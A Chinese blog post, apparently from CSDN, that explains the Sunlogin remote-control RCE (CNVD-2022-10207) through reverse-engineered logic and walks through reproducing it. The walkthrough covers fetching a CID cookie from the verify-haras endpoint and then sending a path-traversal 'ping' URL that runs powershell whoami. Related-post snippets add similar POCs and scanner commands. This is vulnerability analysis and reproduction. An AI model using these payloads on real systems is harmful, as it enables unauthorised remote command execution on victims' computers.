向日葵RCE原理解析——基于逆向工程的静态分析技术

最新推荐文章于 2024-07-29 01:07:12 发布
最新推荐文章于 2024-07-29 01:07:12 发布
阅读量947 收藏 2
点赞数 1
分类专栏: 逆向工程 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lmboss/article/details/129357838
版权
文章详细介绍了向日葵远程控制软件的一个严重漏洞,该漏洞允许未经身份验证的攻击者通过未授权访问的函数和脆弱的check函数执行远程命令。利用过程包括获取特定cookie,然后构造带有ping或nslookup的payload来触发命令执行。提供了一个GitHub链接来展示快速利用脚本,并提到了CNVD-2022-10207作为漏洞编号。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

向日葵RCE 脆弱版本:SunloginClient_11.0.0.33162_X64

一个快速利用的脚本

直接给链接,没什么好说的,script-kids 的最爱。

https://github.com/Mr-xn/sunlogin_rce

深入理解其背后的原理

一句话概括:if函数中的逻辑写的不严谨,导致未授权访问

Step1:问题所在:一个未授权访问的函数

在这里插入图片描述

  • 这里直接比较,action_value是否等于 verify-haras
  • 所以很常规的思路-获取此 verify-haras。我们直接访问http://****:49843/cgi-bin/rpc?action=verify-haras
  • cgi-bin:需要服务器上有 相应的程序对访问者输入的信息进行处理时,会将用户的数据存在cgi-bin目录下

Step2:一个脆弱的 check 函数

在这里插入图片描述

  • 当参数cmd的值以ping或者nslookup开头时,可以构造命令,进而实现远程命令执行利用
  • 利用思路:传参时尽量带上 , ping/ nslookup

Step3:手工payload

  1. 获取不变的cookie
    直接访问,抓包获取cookie
http://****:49843/cgi-bin/rpc?action=verify-haras
  1. exploit
###Get URL
http://****:49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
###Cookie Info
Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25

在这里插入图片描述

参考资料

CNVD-2022-10207:向日葵RCE
Sunlogin RCE漏洞分析和使用

向日葵RCE复现
weixin_43622525的博客
02-28 853
目录 漏洞描述 漏洞复现 手动复现 解决方法 漏洞描述 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞复现 下载含有漏洞版本的向日葵,win7虚拟...
向日葵rce漏洞复现
weixin_59872639的博客
03-01 3141
向日葵 向日葵远程控制是一款提供远程控制服务的软件。向日葵远程控制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备 影响版本 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞复现 PortScan探测或其他工具探测40000到65535的开放端口 浏览器访问ip+端口号+ /c.
向日葵RCE
m0_64338211的博客
03-01 2110
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
CNVD-2022-10207:向日葵RCE
qq_50854662的博客
11-22 828
CNVD-2022-10207:向日葵RCE
向日葵RCE命令执行(Windows <=11.0.0.33)
热门推荐
m0_52400001的博客
02-16 1万+
前言 向日葵个人版企业版均受影响 for Windows <=11.0.0.33 SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce 一、话不多说开始复现 这里用的是 vm虚拟机安装的win10系统 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以哦 3. 打开之后会自动开启一个端
向日葵RCE复现(CNVD-2022-10270/CNVD-2022-03672)
最新发布
m0_68976043的博客
07-29 497
在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID)Cookies添加拿到的CID后加上payload请求。首先打开nmap扫描向日葵主机端口。网上下载低版本的向日葵
windows11向日葵RCE复现(CNVD-2022-10270/CNVD-2022-03672)
人无名,便可潜心练剑。
05-24 1113
windows11向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1356
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
认识漏洞-向日葵RCE、JSON Web 令牌漏洞、CSRF
Boom!脑洞大爆炸的博客
07-27 343
认识漏洞-向日葵RCE、JSON Web 令牌漏洞、CSRF
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
向日葵远程操作软件安装包
04-12
向日葵远程操作软件
SunloginClient_11.0.0.33826_x64.rar
09-27
远程控制电脑,稳定
【渗透测试】Sunlogin-RCE向日葵
SunnyCat
02-17 5440
版本:11.0.0.33.162 安装路径:C:\Program Files\Oray\SunLogin\SunloginClient 一、安装启动向日葵 二、RCE执行 xrkRce.exe -h 192.168.221.130 -t scan -p 1-65535 xrkRce.exe -h 192.168.221.130 -t rce -p 2913 -c “whoami” windows复现成功 苹果复现失败 2022.2.17 久违 ...
向日葵远控rce复现
weixin_45794666的博客
02-24 2992
向日葵 POC ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami 端口扫描 首先扫描端口 获取sid 可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras 每次访问不一样,但是都可以用 dmP
网络攻防|一次实战中的向日葵 RCE Bypass 360
weixin_42282189的博客
07-03 1498
点击上方蓝字关注我们在做攻防项目的时候发现了一个外网的向日葵命令执行但由于存在杀软,无法执行命令下面就来说一下我是如何绕过杀软拿到shell的自己搭了一个虚拟机,也是存在漏洞的向日葵命令执行,环境配置和目标一样,但没装360(后面会说是如何获得目标系统信息的)开始测试,发现首先我通过向日葵和杀软允许的命令判断确认是存在命令执行漏洞的通过网上搜索各种文章,晓得是利用向日葵不禁止命令,然后通过进行目录穿越来执行任意命令的。目标机器上的杀软实际上是禁止调用和等危险的进程,其他exe程序并没有禁止所以我们可以利用或
**标题**: 探索SunloginRCE:高效、精准的向日葵RCE漏洞扫描与利用利器
gitblog_00031的博客
06-21 462
标题: 探索SunloginRCE:高效、精准的向日葵RCE漏洞扫描与利用利器 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 欢迎来到SunloginRCE的世界,一款专为网络安全专家设计的强大工具。它聚焦于向日葵远程控制软件11.x版本中存在的远程代码执行(RCE)漏洞,旨在提供一个高效率、功能全面的解决方案,帮助你在内部网络中快速定位并验证潜在的安全威胁。 技术...
某钉RCE & 某葵RCE 复现
weixin_48421613的博客
02-17 3630
某钉RCE 影响版本 ​6.3.5​ poc dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true ​本地使用hsf搭建服务 4. ​下载受漏洞影响的版本 链接:https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ ​ 提取码:9bcw 公众号回复 hfs 即可获取该工具 登录该版本某钉之后,直接发送poc而后点击即可触发​ 当然了,修复
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值